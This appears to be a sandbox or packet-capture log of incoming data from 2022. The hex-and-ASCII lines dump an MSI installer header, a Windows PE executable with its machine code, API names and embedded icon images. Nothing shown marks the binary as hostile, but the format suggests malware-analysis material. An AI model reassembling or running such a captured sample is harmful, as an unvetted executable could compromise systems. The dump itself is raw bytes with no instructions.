2022-04-20 07:28:15 UTC	17	IN	Data Raw: fe ff 00 00 0a 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 0c 02 00 00 0d 00 00 00 01 00 00 00 78 00 00 00 02 00 00 00 28 01 00 00 03 00 00 00 90 01 00 00 04 00 00 00 08 01 00 00 05 00 00 00 80 00 00 00 07 00 00 00 94 00 00 00 09 00 00 00 a8 00 00 00 0c 00 00 00 d8 00 00 00 0d 00 00 00 e4 00 00 00 0e 00 00 00 f0 00 00 00 0f 00 00 00 f8 00 00 00 12 00 00 00 ec 01 00 00 13 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 0a 00 00 00 49 6e 73 74 61 6c 6c 65 72 00 00 00 1e 00 00 00 0b 00 00 00 49 6e 74 65 6c 3b 31 30 33 33 00 00 1e 00 00 00 27 00 00 00 7b 34 39 38 32 41 36 31 43 2d 39 34 36 44 2d 34 31 36 38 2d 38 30 39 43 2d 31 33 46 46 39 39 Data Ascii: Oh+'0x(InstallerIntel;1033'{4982A61C-946D-4168-809C-13FF99
2022-04-20 07:28:15 UTC	33	IN	Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f0 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 fe ae 1e ec ba cf 70 bf ba cf 70 bf ba cf 70 bf b3 b7 f4 bf fa cf 70 bf b3 b7 e5 bf af cf 70 bf b3 b7 f3 bf 2f cf 70 bf 9d 09 0b bf b5 cf 70 bf ba cf 71 bf 25 cf 70 bf b3 b7 fa bf b7 cf 70 bf b3 b7 e2 bf bb cf 70 bf b3 b7 e1 bf bb cf 70 bf 52 69 63 68 ba cf 70 bf 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 ee dc 2e 60 00 00 00 Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ppppp/ppq%ppppRichpPEL.`
2022-04-20 07:28:15 UTC	49	IN	Data Raw: 50 83 ec 08 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 89 65 f0 8b 5d 08 e8 58 a1 00 00 8b f0 33 c0 89 75 ec 89 43 08 89 43 10 89 43 14 89 45 fc e8 3e b8 01 00 8b 7e 08 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 cc a1 00 00 83 c4 04 8b c8 8d 9b 00 00 00 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 08 e8 04 b8 01 00 bf 60 a6 02 10 8b c7 8d 50 01 90 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 8f a1 00 00 83 c4 04 8b c8 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 10 e8 cd b7 01 00 bf 68 a6 02 10 8b c7 8d 50 01 8a 08 40 84 c9 75 f9 2b c2 8d 70 01 56 e8 59 a1 00 00 83 c4 04 8b c8 8d 49 00 85 f6 76 09 8a 17 88 11 4e 41 47 eb f3 89 43 14 c7 45 fc ff ff ff ff e8 8d b7 01 00 8b 75 ec 8b 06 8a 08 88 4b 0c e8 7e b7 01 00 8b 56 04 8a Data Ascii: PSVW`3PEde]X3uCCCE>~P@u+pVvNAGC`P@u+pVvNAGChP@u+pVYIvNAGCEuK~V
2022-04-20 07:28:15 UTC	65	IN	Data Raw: e8 1b 81 ff ff 8b 45 ec 3b c3 74 07 50 ff 15 38 80 02 10 8b 45 e8 3b c3 74 08 53 50 ff 15 34 80 02 10 8b c6 8b 4d f4 64 89 0d 00 00 00 00 59 5f 5e 5b 8b e5 5d c2 04 00 cc cc cc cc cc cc cc cc 55 8b ec 83 e4 f8 8b d1 8b 4a 04 83 79 f4 00 75 06 32 c0 8b e5 5d c3 e8 04 00 00 00 8b e5 5d c3 55 8b ec 6a ff 68 08 70 02 10 64 a1 00 00 00 00 50 83 ec 0c 53 56 57 a1 60 10 03 10 33 c5 50 8d 45 f4 64 a3 00 00 00 00 8b d9 8b fa b9 08 c1 02 10 e8 7a 01 00 00 8d 45 f0 50 8b cf e8 ff fe ff ff c7 45 fc 00 00 00 00 8b 75 f0 b9 08 c1 02 10 e8 5b 01 00 00 6a 04 68 08 c1 02 10 57 e8 0e f7 ff ff 6a 01 68 08 a9 02 10 57 e8 01 f7 ff ff 85 f6 75 04 33 c0 eb 18 8b c6 8d 50 02 8d 64 24 00 66 8b 08 83 c0 02 66 85 c9 75 f5 2b c2 d1 f8 50 56 57 e8 d9 f6 ff ff 6a 01 68 04 c1 02 10 57 Data Ascii: E;tP8E;tSP4MdY_^[]UJyu2]]UjhpdPSVW`3PEdzEPEu[jhWjhWu3Pd$ffu+PVWjhW
2022-04-20 07:28:15 UTC	81	IN	Data Raw: 00 00 80 e8 08 06 00 00 83 c4 10 c6 45 fc 03 8b 55 e8 83 7a f4 00 75 51 8b 45 ec 68 b4 c7 02 10 50 8d 4d e0 56 bb 40 00 00 00 51 8b d3 b9 02 00 00 80 e8 d9 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 04 e8 fa 82 ff ff c6 45 fc 03 8b 45 e0 83 c0 f0 8d 50 0c 83 c9 ff f0 0f c1 0a 49 85 c9 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 75 4e 8b 55 ec 68 b4 c7 02 10 52 8d 45 dc 56 50 33 d2 b9 01 00 00 80 33 db e8 82 05 00 00 83 c4 10 8d 7d e8 c6 45 fc 05 e8 a3 82 ff ff c6 45 fc 03 8b 45 dc 83 c0 f0 8d 48 0c 83 ca ff f0 0f c1 11 4a 85 d2 7f 0a 8b 08 8b 11 50 8b 42 04 ff d0 8b 4d e8 83 79 f4 00 0f 84 89 01 00 00 8b 45 10 85 db 75 29 85 c0 75 13 8b 55 f0 53 52 68 01 00 00 80 8b de e8 07 0b 00 00 eb 3f 83 f8 01 75 3d 8b 45 ec 6a 00 50 68 01 00 00 80 eb 26 85 c0 Data Ascii: EUzuQEhPMV@Q}EEEPIPBMyuNUhREVP33}EEEHJPBMyEu)uUSRh?u=EjPh&
2022-04-20 07:28:15 UTC	97	IN	Data Raw: 34 83 c0 10 6b c0 14 50 ff 35 7c 45 03 10 57 ff 35 14 2a 03 10 ff 15 68 81 02 10 3b c7 75 04 33 c0 eb 78 83 05 88 45 03 10 10 8b 35 78 45 03 10 a3 7c 45 03 10 6b f6 14 03 35 7c 45 03 10 68 c4 41 00 00 6a 08 ff 35 14 2a 03 10 ff 15 60 81 02 10 89 46 10 3b c7 74 c7 6a 04 68 00 20 00 00 68 00 00 10 00 57 ff 15 64 81 02 10 89 46 0c 3b c7 75 12 ff 76 10 57 ff 35 14 2a 03 10 ff 15 24 81 02 10 eb 9b 83 4e 08 ff 89 3e 89 7e 04 ff 05 78 45 03 10 8b 46 10 83 08 ff 8b c6 5f 5e c3 8b ff 55 8b ec 51 51 8b 4d 08 8b 41 08 53 56 8b 71 10 57 33 db eb 03 03 c0 43 85 c0 7d f9 8b c3 69 c0 04 02 00 00 8d 84 30 44 01 00 00 6a 3f 89 45 f8 5a 89 40 08 89 40 04 83 c0 08 4a 75 f4 6a 04 8b fb 68 00 10 00 00 c1 e7 0f 03 79 0c 68 00 80 00 00 57 ff 15 64 81 02 10 85 c0 75 08 83 c8 ff Data Ascii: 4kP5\|EW5h;u3xE5xE\|Ek5\|EhAj5`F;tjh hWdF;uvW5*$N>~xEF_^UQQMASVqW3C}i0Dj?EZ@@JujhyhWdu
2022-04-20 07:28:15 UTC	113	IN	Data Raw: ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 51 a3 ff ff 83 c4 14 83 c8 ff e9 06 02 00 00 66 39 30 74 db 53 8b 5d 10 3b de 74 0b 8b 03 3b c6 74 05 66 39 30 75 20 e8 6d b6 ff ff 56 56 56 56 56 c7 00 16 00 00 00 e8 19 a3 ff ff 83 c4 14 83 c8 ff e9 cd 01 00 00 e8 4d b6 ff ff 8b 00 89 45 ec e8 43 b6 ff ff ff 75 14 89 30 53 ff 75 0c ff 75 08 e8 2c 02 00 00 83 c4 10 89 45 f4 83 f8 ff 0f 85 6f 01 00 00 e8 1e b6 ff ff 83 38 02 0f 85 61 01 00 00 6a 2f ff 75 0c e8 e0 77 00 00 59 59 85 c0 0f 85 4d 01 00 00 68 74 85 02 10 8d 45 fc 56 50 e8 30 05 00 00 83 c4 0c 3b c6 74 1b 83 f8 16 0f 85 2e 01 00 00 56 56 56 56 56 e8 6c a1 ff ff 83 c4 14 e9 1c 01 00 00 39 75 fc 0f 84 13 01 00 00 6a 02 bb 04 01 00 00 53 e8 96 10 00 00 8b f8 59 59 3b fe 0f 84 fa 00 00 00 68 03 01 00 00 57 Data Ascii: VVVVVQf90tS];t;tf90u mVVVVVMECu0Suu,Eo8aj/uwYYMhtEVP0;t.VVVVVl9ujSYY;hW
2022-04-20 07:28:15 UTC	129	IN	Data Raw: 59 01 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 48 04 00 00 0f b6 70 02 0f b6 59 02 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 27 04 00 00 0f b6 70 03 0f b6 59 03 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 02 04 00 00 8b 70 04 3b 71 04 74 7e 0f b6 70 04 0f b6 59 04 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 d9 03 00 00 0f b6 70 05 0f b6 59 05 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 b8 03 00 00 0f b6 70 06 0f b6 59 06 2b f3 74 15 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 85 f6 0f 85 97 03 00 00 0f b6 70 07 0f b6 59 07 2b f3 74 11 33 db 85 f6 0f 9f c3 8d 5c 1b ff 8b f3 eb 02 33 f6 85 f6 0f 85 72 03 00 00 8b 70 08 3b 71 08 74 7e 0f b6 70 08 0f b6 Data Ascii: Y+t3\HpY+t3\'pY+t3\3p;qt~pY+t3\pY+t3\pY+t3\pY+t3\3rp;qt~p
2022-04-20 07:28:15 UTC	145	IN	Data Raw: 38 5d fc 74 07 8b 4d f8 83 61 70 fd 5e 5f 5b c9 c3 8b ff 55 8b ec 53 57 33 ff 39 3d 74 2b 03 10 75 7d 8b 5d 08 3b df 75 1f e8 79 36 ff ff 57 57 57 57 57 c7 00 16 00 00 00 e8 25 23 ff ff 83 c4 14 b8 ff ff ff 7f eb 69 8b 55 0c 3b d7 74 da 81 7d 10 ff ff ff 7f 77 d1 0f b7 03 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 0f b7 c8 0f b7 02 66 83 f8 41 72 09 66 83 f8 5a 77 03 83 c0 20 43 43 42 42 ff 4d 10 0f b7 c0 74 0a 66 3b cf 74 05 66 3b c8 74 c3 0f b7 d0 0f b7 c1 2b c2 eb 12 57 ff 75 10 ff 75 0c ff 75 08 e8 20 fe ff ff 83 c4 10 5f 5b 5d c3 8b ff 55 8b ec 51 51 53 56 8b 35 dc 2b 03 10 33 db 89 5d fc 8b 06 57 3b c3 74 50 8b 3d 90 80 02 10 53 53 6a ff 50 53 53 ff d7 89 45 f8 3b c3 74 41 6a 02 50 e8 95 90 ff ff 59 59 89 45 fc 3b c3 74 30 ff 75 f8 50 6a ff ff 36 Data Ascii: 8]tMap^_[USW39=t+u}];uy6WWWWW%#iU;t}wfArfZw fArfZw CCBBMtf;tf;t+Wuuu _[]UQQSV5+3]W;tP=SSjPSSE;tAjPYYE;t0uPj6
2022-04-20 07:28:15 UTC	161	IN	Data Raw: 02 10 8b ff 55 8b ec 51 53 8b 45 0c 83 c0 0c 89 45 fc 64 8b 1d 00 00 00 00 8b 03 64 a3 00 00 00 00 8b 45 08 8b 5d 0c 8b 6d fc 8b 63 fc ff e0 5b c9 c2 08 00 58 59 87 04 24 ff e0 8b ff 55 8b ec 51 51 53 56 57 64 8b 35 00 00 00 00 89 75 fc c7 45 f8 66 1c 02 10 6a 00 ff 75 0c ff 75 f8 ff 75 08 e8 96 ff ff ff 8b 45 0c 8b 40 04 83 e0 fd 8b 4d 0c 89 41 04 64 8b 3d 00 00 00 00 8b 5d fc 89 3b 64 89 1d 00 00 00 00 5f 5e 5b c9 c2 08 00 55 8b ec 83 ec 08 53 56 57 fc 89 45 fc 33 c0 50 50 50 ff 75 fc ff 75 14 ff 75 10 ff 75 0c ff 75 08 e8 96 0f 00 00 83 c4 20 89 45 f8 5f 5e 5b 8b 45 f8 8b e5 5d c3 8b ff 55 8b ec 56 fc 8b 75 0c 8b 4e 08 33 ce e8 7b dc fe ff 6a 00 56 ff 76 14 ff 76 0c 6a 00 ff 75 10 ff 76 10 ff 75 08 e8 59 0f 00 00 83 c4 20 5e 5d c3 8b ff 55 8b ec 83 ec Data Ascii: UQSEEddE]mc[XY$UQQSVWd5uEfjuuuE@MAd=];d_^[USVWE3PPPuuuuu E_^[E]UVuN3{jVvvjuvuY ^]U
2022-04-20 07:28:15 UTC	177	IN	Data Raw: 83 ce 08 a9 00 04 00 00 74 03 83 ce 04 a9 00 08 00 00 74 03 83 ce 02 a9 00 10 00 00 74 03 83 ce 01 a9 00 01 00 00 74 06 81 ce 00 00 08 00 8b c8 bb 00 60 00 00 23 cb 74 2a 81 f9 00 20 00 00 74 1c 81 f9 00 40 00 00 74 0c 3b cb 75 16 81 ce 00 03 00 00 eb 0e 81 ce 00 02 00 00 eb 06 81 ce 00 01 00 00 bf 40 80 00 00 23 c7 83 e8 40 74 1c 2d c0 7f 00 00 74 0d 83 e8 40 75 16 81 ce 00 00 00 01 eb 0e 81 ce 00 00 00 03 eb 06 81 ce 00 00 00 02 8b 45 ec 8b d0 23 45 08 f7 d2 23 d6 0b d0 3b d6 75 07 8b c6 e9 b0 00 00 00 e8 16 fd ff ff 50 89 45 f4 e8 8a 02 00 00 59 0f ae 5d f4 8b 4d f4 33 d2 84 c9 79 03 6a 10 5a f7 c1 00 02 00 00 74 03 83 ca 08 f7 c1 00 04 00 00 74 03 83 ca 04 f7 c1 00 08 00 00 74 03 83 ca 02 f7 c1 00 10 00 00 74 03 83 ca 01 be 00 01 00 00 85 ce 74 06 81 Data Ascii: tttt`#t* t@t;u@#@t-t@uE#E#;uPEY]M3yjZttttt
2022-04-20 07:28:15 UTC	193	IN	Data Raw: 50 9d 02 10 47 42 52 00 64 9c 02 10 47 42 52 00 54 9c 02 10 55 53 41 00 4c 9d 02 10 55 53 41 00 0c 0c 1a 0c 07 10 36 04 0c 08 2d 04 03 04 0c 10 10 08 1d 08 30 00 00 00 4f 43 50 00 41 43 50 00 4e 6f 72 77 65 67 69 61 6e 2d 4e 79 6e 6f 72 73 6b 00 00 00 00 00 00 00 06 80 80 86 80 81 80 00 00 10 03 86 80 86 82 80 14 05 05 45 45 45 85 85 85 05 00 00 30 30 80 50 80 88 00 08 00 28 27 38 50 57 80 00 07 00 37 30 30 50 50 88 00 00 00 20 28 80 88 80 80 00 00 00 60 68 60 68 68 68 08 08 07 78 70 70 77 70 70 08 08 00 00 08 00 08 00 07 08 00 00 00 53 00 79 00 73 00 74 00 65 00 6d 00 52 00 6f 00 6f 00 74 00 00 00 00 00 47 65 74 50 72 6f 63 65 73 73 57 69 6e 64 6f 77 53 74 61 74 69 6f 6e 00 47 65 74 55 73 65 72 4f 62 6a 65 63 74 49 6e 66 6f 72 6d 61 74 69 6f 6e 41 00 00 Data Ascii: PGBRdGBRTUSALUSA6-0OCPACPNorwegian-NynorskEEE00P('8PW700PP (`h`hhhxppwppSystemRootGetProcessWindowStationGetUserObjectInformationA
2022-04-20 07:28:15 UTC	209	IN	Data Raw: 00 00 00 00 01 00 00 00 0c e4 02 10 14 e4 02 10 00 00 00 00 58 22 03 10 00 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 fc e3 02 10 74 22 03 10 01 00 00 00 00 00 00 00 ff ff ff ff 00 00 00 00 40 00 00 00 c4 e3 02 10 00 00 00 00 d0 23 01 00 e4 80 01 00 68 ed 01 00 c5 1c 02 00 cf 1d 02 00 c8 5f 02 00 ee 5f 02 00 1c 60 02 00 49 60 02 00 6c 60 02 00 87 60 02 00 b0 60 02 00 d8 60 02 00 34 61 02 00 84 61 02 00 a0 61 02 00 cb 61 02 00 f8 61 02 00 28 62 02 00 58 62 02 00 c1 62 02 00 04 63 02 00 40 63 02 00 88 63 02 00 d0 63 02 00 18 64 02 00 4b 64 02 00 89 64 02 00 b8 64 02 00 e8 64 02 00 18 65 02 00 48 65 02 00 8b 65 02 00 c9 65 02 00 09 66 02 00 52 66 02 00 a1 66 02 00 e2 66 02 00 29 67 02 00 88 67 02 00 c8 67 02 00 f8 67 02 00 30 68 02 00 58 68 02 Data Ascii: X"@t"@#h__`I`l````4aaaaa(bXbbc@cccdKddddeHeeefRfff)gggg0hXh
2022-04-20 07:28:15 UTC	225	IN	Data Raw: 00 00 00 00 00 00 00 00 50 c3 0f 40 00 00 00 00 00 00 00 00 24 f4 12 40 00 00 00 00 00 00 00 80 96 98 16 40 00 00 00 00 00 00 00 20 bc be 19 40 00 00 00 00 00 04 bf c9 1b 8e 34 40 00 00 00 a1 ed cc ce 1b c2 d3 4e 40 20 f0 9e b5 70 2b a8 ad c5 9d 69 40 d0 5d fd 25 e5 1a 8e 4f 19 eb 83 40 71 96 d7 95 43 0e 05 8d 29 af 9e 40 f9 bf a0 44 ed 81 12 8f 81 82 b9 40 bf 3c d5 a6 cf ff 49 1f 78 c2 d3 40 6f c6 e0 8c e9 80 c9 47 ba 93 a8 41 bc 85 6b 55 27 39 8d f7 70 e0 7c 42 bc dd 8e de f9 9d fb eb 7e aa 51 43 a1 e6 76 e3 cc f2 29 2f 84 81 26 44 28 10 17 aa f8 ae 10 e3 c5 c4 fa 44 eb a7 d4 f3 f7 eb e1 4a 7a 95 cf 45 65 cc c7 91 0e a6 ae a0 19 e3 a3 46 0d 65 17 0c 75 81 86 75 76 c9 48 4d 58 42 e4 a7 93 39 3b 35 b8 b2 ed 53 4d a7 e5 5d 3d c5 5d 3b 8b 9e 92 5a ff 5d a6 Data Ascii: P@$@@ @4@N@ p+i@]%O@qC)@D@<Ix@oGAkU'9p\|B~QCv)/&D(DJzEeFeuuvHMXB9;5SM]=];Z]
2022-04-20 07:28:15 UTC	241	IN	Data Raw: 00 00 01 00 0d 00 30 30 10 00 01 00 04 00 68 06 00 00 d6 00 00 00 20 20 10 00 01 00 04 00 e8 02 00 00 3e 07 00 00 18 18 10 00 01 00 04 00 e8 01 00 00 26 0a 00 00 10 10 10 00 01 00 04 00 28 01 00 00 0e 0c 00 00 30 30 00 00 01 00 08 00 a8 0e 00 00 36 0d 00 00 20 20 00 00 01 00 08 00 a8 08 00 00 de 1b 00 00 18 18 00 00 01 00 08 00 c8 06 00 00 86 24 00 00 10 10 00 00 01 00 08 00 68 05 00 00 4e 2b 00 00 00 00 00 00 01 00 20 00 d2 d9 00 00 b6 30 00 00 30 30 00 00 01 00 20 00 a8 25 00 00 88 0a 01 00 20 20 00 00 01 00 20 00 a8 10 00 00 30 30 01 00 18 18 00 00 01 00 20 00 88 09 00 00 d8 40 01 00 10 10 00 00 01 00 20 00 68 04 00 00 60 4a 01 00 28 00 00 00 30 00 00 00 60 00 00 00 01 00 04 00 00 00 00 00 80 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 Data Ascii: 00h >&(006 $hN+ 000 % 00 @ h`J(0`
2022-04-20 07:28:15 UTC	257	IN	Data Raw: 0a 03 09 51 15 00 00 ff 04 2c 35 42 40 2e 0a 0a 0a 03 09 0a 15 00 00 03 03 03 03 03 03 03 03 03 03 03 09 0a 15 00 00 00 04 06 06 06 06 06 06 09 09 09 09 0a 15 00 00 00 04 51 39 39 39 39 39 39 39 39 39 51 15 00 00 00 15 15 15 15 15 15 15 15 15 15 15 15 12 00 00 04 00 2a 13 13 13 13 13 13 13 13 13 3a 00 04 00 00 00 47 47 47 47 47 47 47 47 47 47 47 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 00 01 00 00 c0 01 00 00 c0 01 00 00 c0 01 00 00 a0 02 00 00 e0 03 00 00 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 01 00 00 00 01 00 08 06 00 00 00 5c 72 a8 66 00 00 20 00 49 44 41 54 78 9c ec bd 79 ac 2c d9 7d df f7 39 e7 d4 d2 eb dd de 36 6f de bc 19 ce 0c 87 9b 44 91 22 47 a2 Data Ascii: Q,5B@.Q999999999Q*:GGGGGGGGGGGPNGIHDR\rf IDATxy,}96oD"G
2022-04-20 07:28:15 UTC	273	IN	Data Raw: 24 5e e6 0a 37 c2 e2 59 30 46 0d 05 58 6d 9a e8 c4 2d 1b 4d 93 94 34 d5 18 0b 7b c7 2d 52 ed 12 4e 28 4f 21 90 08 2b 90 08 3c 2f 20 f4 7d 82 d0 c3 0f 14 be a7 86 29 a6 83 c0 73 06 d0 7a c5 2d 3d f5 9c 57 c2 1a 43 9c 24 a4 71 44 92 c4 1c b7 0f b1 46 43 d2 46 58 1f 21 2c 81 02 4f 42 e0 09 94 04 4f 81 12 16 25 41 65 be f9 22 08 49 38 db 43 ee b3 2f 83 dc 3d 45 ca 7a bd b0 36 f3 23 e4 28 96 80 1e 29 33 a2 06 d8 d1 77 38 ca 48 26 be b6 e2 9a d5 d4 ef ff 13 f4 c5 ff 1c 1d 3c 31 a5 f0 69 74 52 cd f8 76 a0 c7 22 12 70 de 19 ff b4 ce 6e 6d 6d c5 4a a9 21 03 00 46 c4 f9 dc f5 57 3e 9f eb fe d3 ac ba e3 6a 83 db b8 42 b2 75 e9 09 3c df 63 d0 eb 71 bc 7b c8 e6 a5 f3 54 2b 55 a2 38 21 d1 31 42 09 a4 ca 0c 5e 3e 66 2c 58 00 00 20 00 49 44 41 54 c6 a2 85 73 85 09 03 56 Data Ascii: $^7Y0FXm-M4{-RN(O!+</ })sz-=WC$qDFCFX!,OBO%Ae"I8C/=Ez6#()3w8H&<1itRv"pnmmJ!FW>jBu<cq{T+U8!1B^>f,X IDATsV
2022-04-20 07:28:15 UTC	289	IN	Data Raw: 55 b0 00 9c 0f 85 58 4a 13 fc 77 13 b2 3b 5b e4 de 7e a5 5e d2 dc dd ac 40 9f f9 5b 66 ef 0a 8a dd 98 40 72 27 0e 59 66 ef 02 dd 45 08 dc 77 03 d1 7b c1 01 bc 4a 53 c2 97 4e 1a d1 da d5 75 1d b0 2a 7b 7e 79 db d0 c1 39 03 74 a3 f8 4a 1d 1d 1d 9d 3b 6b 1a 6b 1c eb f5 9a 2c cb 76 52 67 5d a6 e9 fa f9 69 59 a2 ee ef fb 6e 81 8b 02 48 f4 d6 0f bd f9 bd 8b 23 b2 9d 0f 7d 08 3a d7 e6 bd 67 bd 5e f3 ed 6f 7f 9b d5 6a c5 f3 e7 cf 19 8f c7 e4 59 86 2e 32 f2 a3 11 72 90 63 44 68 2d 96 67 90 8f 35 62 a0 29 ca 01 d2 87 1e 80 5a 6b ca b2 dc 39 bf ad 20 50 8a b2 1c 30 c8 0a 6a b1 0a 26 7e 27 f6 91 4e a8 bb 5d 97 c9 fb 50 dc 43 cb 76 ef c7 ee e3 4c 31 93 d4 99 c8 98 06 b3 5e 32 1c 54 64 3a c7 3a 87 b1 21 38 a7 62 5f c3 d4 35 28 59 65 ad 29 df c2 76 db 28 63 2b 2c fa cc Data Ascii: UXJw;[~^@[f@r'YfEw{JSNu*{~y9tJ;kk,vRg]iYnH#}:g^ojY.2rcDh-g5b)Zk9 P0j&~'N]PCvL1^2Td::!8b_5(Ye)v(c+,
2022-04-20 07:28:15 UTC	305	IN	Data Raw: 05 45 d3 e9 d2 b5 0b 4b 13 b2 6c c0 60 30 60 34 1a 32 1a 0d d9 db bb c4 78 bc c3 72 b5 e0 e8 f0 88 d3 e9 a9 af 87 6f 98 9e 9c b0 9c cf 89 a2 94 24 8d bd 65 91 91 a6 a9 4b 71 96 0e 29 c7 27 cf 28 19 e2 f7 6b 8d d8 18 8d c0 cd fa d3 ae 35 12 da 18 f2 bc e2 68 7a cc ed fb f7 b8 3f 3d a2 aa 0b 94 90 8c 64 c2 64 30 64 9c 66 a4 49 06 89 e4 be 5e 72 6f 7e cc d1 62 ee 42 9d 52 b5 80 a2 c1 e1 0b c1 05 b0 04 79 60 31 62 ad c9 37 ec 83 c0 fc 3e 04 10 f4 b6 41 b4 b8 a7 05 a4 12 ad af 6f b0 9c 34 c7 3c 1b 3d b7 3e d2 03 19 5f b4 ef c3 b5 70 8f cd b0 e1 a6 fb d0 59 e3 b9 18 40 18 16 ab 59 2c 56 94 65 41 5d 57 3e cb f2 7c 80 cf 45 2d 60 30 18 b3 b3 b3 cb 70 38 72 c0 b1 cf 8d 88 63 98 4c 76 e3 9d 9d 89 c5 e1 57 09 8e e9 97 38 01 10 80 bf a0 f5 b7 e5 f3 5f 98 1e d7 c5 7e Data Ascii: EKl`0`42xro$eKq)'(k5hz?=dd0dfI^ro~bBRy`1b7>Ao4<=>_pY@Y,VeA]W>\|E-`0p8rcLvW8_~
2022-04-20 07:28:15 UTC	321	IN	Data Raw: ff 00 00 00 01 ff 00 00 ff 00 00 00 01 7f 00 00 d7 c6 00 00 03 3f 00 00 ff c6 00 00 03 ff 00 00 ff ff ff ff ff ff 00 00 ff ff ff ff ff ff 00 00 28 00 00 00 20 00 00 00 40 00 00 00 01 00 20 00 00 00 00 00 80 10 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b7 bf b7 0f b2 c2 c6 39 bc c8 cd 72 bc cc dc b0 c5 d0 d8 df 87 87 86 5e 00 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 c6 c5 be Data Ascii: ?( @ 9r^
2022-04-20 07:28:15 UTC	337	IN	Data Raw: c8 45 33 c9 33 c9 83 f8 7f 0f 87 1e 02 00 00 45 8b c6 41 8b d6 ff 15 d1 67 00 00 48 8b c8 48 89 05 5f 9c 00 00 ff 15 51 67 00 00 44 8d 47 04 48 8d 15 7a b2 00 00 48 8d 0d 5f 6c 00 00 e8 ca 20 00 00 85 c0 75 2d 21 7c 24 28 45 33 c9 45 33 c0 33 c9 ba b1 04 00 00 c7 44 24 20 10 00 00 00 e8 58 1e 00 00 c7 05 22 a9 00 00 14 07 07 80 e9 d3 01 00 00 8b 05 37 b2 00 00 a8 40 75 08 84 c0 0f 89 b8 00 00 00 41 b8 04 01 00 00 48 8d 54 24 30 48 8d 0d 15 6c 00 00 e8 70 20 00 00 33 c9 85 c0 75 0c 21 7c 24 28 45 33 c9 45 33 c0 eb a4 4c 8d 44 24 30 41 8b d6 ff 15 70 66 00 00 48 89 05 b9 9b 00 00 48 85 c0 74 75 ff 15 6e 65 00 00 3d b7 00 00 00 75 68 45 33 c9 4c 8d 05 e5 a8 00 00 33 c9 f6 05 c8 b1 00 00 80 74 18 21 7c 24 28 ba 4b 05 00 00 c7 44 24 20 10 00 00 00 e8 bc 1d 00 Data Ascii: E33EAgHH_QgDGHzH_l u-!\|$(E3E33D$ X"7@uAHT$0Hlp 3u!\|$(E3E3LD$0ApfHHtune=uhE3L3t!\|$(KD$
2022-04-20 07:28:15 UTC	353	IN	Data Raw: 98 29 00 00 49 03 dc 3c 41 74 47 3c 44 74 3a 3c 49 74 2d 3c 4e 74 20 3c 50 74 12 3c 53 74 05 41 8b f7 eb 3b 83 0d 7d 72 00 00 04 eb 2b 0f ba 2d 3f 64 00 00 07 eb 28 83 25 6a 72 00 00 fe eb 18 83 25 61 72 00 00 fd eb 0f 83 0d 24 64 00 00 40 eb 0d 09 3d 50 72 00 00 44 89 25 f5 60 00 00 8a 03 84 c0 75 95 e9 4a ff ff ff 83 4c 24 28 ff 48 8d 44 24 41 41 83 c9 ff 48 89 44 24 20 4c 8d 05 78 2d 00 00 41 8b d4 b9 7f 00 00 00 ff 15 a2 25 00 00 2b c7 0f 84 1a ff ff ff e9 12 ff ff ff 8a 44 24 42 84 c0 75 0c 66 89 3d b6 60 00 00 e9 01 ff ff ff 3c 3a 0f 85 f6 fe ff ff 48 0f be 4c 24 43 ff 15 d5 28 00 00 3c 31 74 dc 3c 41 74 09 3c 55 74 d4 e9 d9 fe ff ff 66 44 89 25 84 60 00 00 e9 cf fe ff ff 8a 44 24 42 84 c0 75 0c 44 89 25 64 60 00 00 e9 bb 